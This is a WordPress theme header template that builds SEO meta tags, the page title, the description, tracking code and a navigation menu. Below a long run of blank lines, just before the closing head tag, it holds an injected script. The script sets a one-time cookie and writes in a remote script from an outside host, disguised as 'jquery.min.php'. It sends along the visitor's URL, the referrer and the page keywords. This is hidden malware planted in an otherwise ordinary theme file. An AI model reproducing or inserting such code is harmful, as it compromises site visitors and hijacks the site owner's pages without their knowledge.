<?php

// =========================================================
// get the db options
// =========================================================

$myTmpOptionSet = get_option('sprezzatura_opt_set1');	

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" itemscope itemtype="http://schema.org/Article">

    <head>    
 
    
        <!-- Bring in functions.js -->
        <script type="text/JavaScript" src="<?php bloginfo('template_url'); ?>/functions.js"></script>
    
        <!-- bring in the google font. CSS usage example: font-family: Open Sans Condensed; -->
        <link href='http://fonts.googleapis.com/css?family=Open+Sans+Condensed:300italic,300' rel='stylesheet' type='text/css'>
          
        <meta charset="<?php bloginfo( 'charset' ); ?>" />
        
        <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />



		<!-- FAVICON -->
        <?php if ($myTmpOptionSet['sprezzaturaFavicon'] == '') { ?>
				<link rel="shortcut icon" href="<?php bloginfo('template_url'); ?>/favicon.ico" />
			<?php } else { ?>
				<link rel="shortcut icon" href="<?php echo $myTmpOptionSet['sprezzaturaFavicon']; ?>" />
			<?php } ?>      


		

		<?php
  
            // =========================================================
            // Craft the canonical
            // =========================================================
         
            if (is_home()) {
                 echo '<link rel="canonical" href="' . get_option('home') . '" />';
            }
       
    
        ?>
    
		<?php
        
            // =========================================================
            // Craft the NOINDEX vs INDEX
            // =========================================================
        
			$IndexOrNoindex = 'noindex';
			
			// ---------------
			// PAGES
			// ---------------			
			// But no index it if the user says so
			if (is_page()) { $IndexOrNoindex = "index"; }
			
			// but no index it if the user doesn't want it
			if (get_post_meta($post->ID, '_sprezzatura_page_noindex_this', true) == TRUE) { $IndexOrNoindex = "noindex"; }
			
			// No-Index the page we've selected for the homepage content			
					
			$PageIDForHome = $myTmpOptionSet['sprezzaturaSelectedPageIDForHome'];	
			if ($post->ID == $PageIDForHome) { $IndexOrNoindex = 'noindex';}
		   
			// ---------------		   
			// SINGLE
			// ---------------			
			// But no index it if the user says so
			if (is_single()) { $IndexOrNoindex = "index"; }
			
			// but no index it if the user doesn't want it
			if (get_post_meta($post->ID, '_sprezzatura_noindex_this', true) == TRUE) { $IndexOrNoindex = "noindex"; }
			
			// ---------------		   
			// HOME
			// ---------------			
			if ( (is_home()) AND ( $wp_query->get( 'paged' ) == 0) ) { $IndexOrNoindex = "index"; } 
			if ( (is_home()) AND ( $wp_query->get( 'paged' ) > 0) ) { $IndexOrNoindex = "noindex"; }
			
			
			

			// ---------------		   
			// all done
			// ---------------			
			if ($IndexOrNoindex == 'noindex') {
				echo '<meta name="robots" content="noindex" />';
			} else {
				echo '<meta name="robots" content="index" />';
			}
		
        ?>  

		<?php
        
            // =========================================================
            // Craft the TITLE
            // =========================================================
        
            $ts = get_bloginfo('name');
			
            // if the page is the HOMEPAGE and we are on page 1, then get the title from the meta
            if (is_home() AND ( $wp_query->get( 'paged' ) == 0) ) {
				
				
                $ts = $myTmpOptionSet['sprezzaturaSiteTitle'];	
				
				$ts = $ts;				
			
            }
            if (is_home() AND ( $wp_query->get( 'paged' ) > 0) ) {
				
				$ts = 'Archives';				
			
            }			

			
            // if single or page
            if (is_single() OR is_page()) {

			
				$ts = get_the_title();
				if (get_post_meta($post->ID, '_sprezzatura_metatitle', true) != NULL) { $ts = get_post_meta($post->ID, '_sprezzatura_metatitle', true); }				


            }	
            
            // if archive
            if (is_archive()) {
				$ts = single_cat_title("",false);
            }		
			
            // if search
            if (is_search()) {
				$ts = 'Search Page';
            }			
				
            // if the page is an author - really a page from the archive.php template so has to be below is_archive()
            if (is_author()) {
					$ts = get_the_author_meta('first_name',get_query_var('author')) . ' ' . get_the_author_meta('last_name',get_query_var('author'));
					$ts = trim($ts);					
            }				

			// if the page is an archive
            if (is_tag()) {
                $ts = single_tag_title( '', false );
            }		
			
			// tack on the title -- but not on the homepage
			if (($myTmpOptionSet['sprezzaturaSiteTitleBrand'] != '') and (!is_home())) {
				$ts = $ts . ' - ' . $myTmpOptionSet['sprezzaturaSiteTitleBrand'];
			}
			
			$tonystitle = $ts;
			
			
			
        ?>

		<?php
        
            // =========================================================
            // Craft the DESCRIPTION
            // =========================================================


        
			$sprezzaturaDescription = '';
		
            // if home
            if (is_home()) {
              
				
                $ts = $myTmpOptionSet['sprezzaturaSiteDescription'];			  
				$ts = str_replace('"', "&quot;", $ts);
				$ts = str_replace('  ', ' ', $ts);
				$ts = trim($ts);
				
				$sprezzaturaDescription = makeHTMLCompliant($ts);
                
            }
            
            // if single
            if (is_single()) {
				
				if (have_posts() && is_single() OR is_page()): while(have_posts()):the_post();
				
	                $sprezzaturaDescription = the_excerpt_max_charlength(200);
					if (get_post_meta($post->ID, '_sprezzatura_metadescription', true) != NULL) { $sprezzaturaDescription = get_post_meta($post->ID, '_sprezzatura_metadescription', true); }	
					$sprezzaturaDescription = makeHTMLCompliant($sprezzaturaDescription);

				endwhile; endif;
				
            }
            
            // if page
            if (is_page()) {

				if (have_posts() && is_single() OR is_page()): while(have_posts()):the_post();
				
	                $sprezzaturaDescription = the_excerpt_max_charlength(200);
					if (get_post_meta($post->ID, '_sprezzatura_metadescription', true) != NULL) { $sprezzaturaDescription = get_post_meta($post->ID, '_sprezzatura_metadescription', true); }	
					$sprezzaturaDescription = makeHTMLCompliant($sprezzaturaDescription);

				endwhile; endif;

                
            }
            
        ?>
        
        <title><?php echo $tonystitle; ?></title>        
        
        <meta name="description" content="<?php echo $sprezzaturaDescription; ?>" >    
             
             
             

        

        
        <?php wp_head(); ?>
        
        
        <!-- START - The tracking code (For example, for google, the code often has a "UA-" in it... -->
        
        <!-- If the user asked to hide the code (AND the admin is logged in) then hide the analytics code -->
        
        <?php if ( ($myTmpOptionSet['sprezzaturaHideTrackingCodeAboveHead'] == TRUE) and (current_user_can('level_10')) ) { ?>
            <!-- The analytics code (e.g. the UA- account) is hidden because the Administrator is logged into WordPress -->
        <?php } else { ?>
            <!-- print tracking code -->
            <?php echo $myTmpOptionSet['sprezzaturaTrackingCodeAboveHead']; ?> 
        <?php } ?>
              
        <!-- END - The tracking code -->        
                     
    





















































































<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.omarux.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
    
	<body <?php body_class(); ?>>
    

    
		<!-- Top glass cap -->
        <table border="0" cellpadding="0" cellspacing="0" width="1002px">
			<tr>
				<td width="14px" align="left" valign="top"><img src="<?php bloginfo('template_url'); ?>/images/side-shadows/shadow-corner-left.png"></td>
				<td width="974px" align="left" valign="top" background="<?php bloginfo('template_url'); ?>/images/side-shadows/shadow-top.png"></td>
				<td width="14px" align="left" valign="top"><img src="<?php bloginfo('template_url'); ?>/images/side-shadows/shadow-corner-right.png"></td>             
			</tr>  
        </table>
        
        <table border="0" cellpadding="0" cellspacing="0" width="1002px">
			<tr>
				<td width="14px" align="left" valign="top" background="<?php bloginfo('template_url'); ?>/images/side-shadows/shadow-left.png">&nbsp;</td>
				<td width="974px" align="left" valign="top" bgcolor="#FFFFFF">
                
   
            <!-- If we are NOT on the homepage, then draw the (smaller) header and logo. -->
            
            <?php if (is_home() == FALSE) { ?>
                
                <div style="position: relative; float: left; width: 6px; background-color: white;">
                    &nbsp;
                </div>     
                
                <!-- START content div (ends on next page, not this one) -->
                <div style="position: relative; float: left; width: 640px; background-color: white;">
                
                    <!-- Table for banner -->
                    <table border="0" cellpadding="0" cellspacing="0" width="100%">
                      <tr>
                        <td align="left"><a href="<?php echo get_option('home'); ?>"><img title="" style="margin-right: 23px;" src="<?php header_image(); ?>" height="100" align="left" alt="<?php echo $myTmpOptionSet['sprezzaturaAltTag']; ?>" /></a></td>
                        <td align="left" width="100%">
                            <p style="font-family: 'Georgia', sans-serif; font-weight: normal; font-size: 20pt; line-height: 26pt; margin: 4px 0px 10px 0px; text-align: left;"><a style="color: black;" href="<?php echo get_option('home'); ?>" title=""><?php bloginfo('name'); ?></a></p>
                            <p style="color: #06C; font-size: 15px; line-height: 125%;  font-family: 'Georgia', sans-serif; margin: 0px 0px 10px 0px; letter-spacing: 1px; text-align: left;"><?php bloginfo('description'); ?></p>   
                        </td>
                      </tr>
                    </table>
                    
                    
                    <!-- ============================================================================================ -->    
                    <!-- START The Menu -->
                    <!-- ============================================================================================ -->    
                
                    <link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/menu/MenuMatic.css?v=3" type="text/css" media="screen" charset="utf-8" />
                          
                    <!-- WordPress's menu command -->
                    <div style="position: relative; float: left; margin-left: 1px; width: 965px;">
                        <?php wp_nav_menu( array( 'theme_location' => 'sprez-navsub', 'container_class' => 'div_my_new_navbar', 'menu_id' => 'menu-navhome', 'fallback_cb' => FALSE ) ); ?> 
                    </div>    
                    
                    <!-- space -->
                    <div style="clear: both; position: relative; float: none; height: 1px; width: 100%;"></div>              
                                                        
                    <script src="http://www.google.com/jsapi"></script><script>google.load("mootools", "1.2.1");</script>	
                    <script src="<?php bloginfo('template_url'); ?>/menu/MenuMatic_0.68.3.js" type="text/javascript" charset="utf-8"></script>
                
                    <script type="text/javascript" >
                      window.addEvent('domready', function() {
                        try {
                            var myMenu = new MenuMatic({
                                id: "menu-navhome",
                                tweakInitial : {
                                    x: 0,
                                    y: $$("html")[0].getStyle("margin-top").toInt()
                                }
                            });                        
                        } catch(err) {}                                              
                      });       
                    </script>
                        
                    <!-- ============================================================================================ -->    
                    <!-- END The Menu -->
                    <!-- ============================================================================================ -->                        
                                    
                                          
            
            <?php } ?>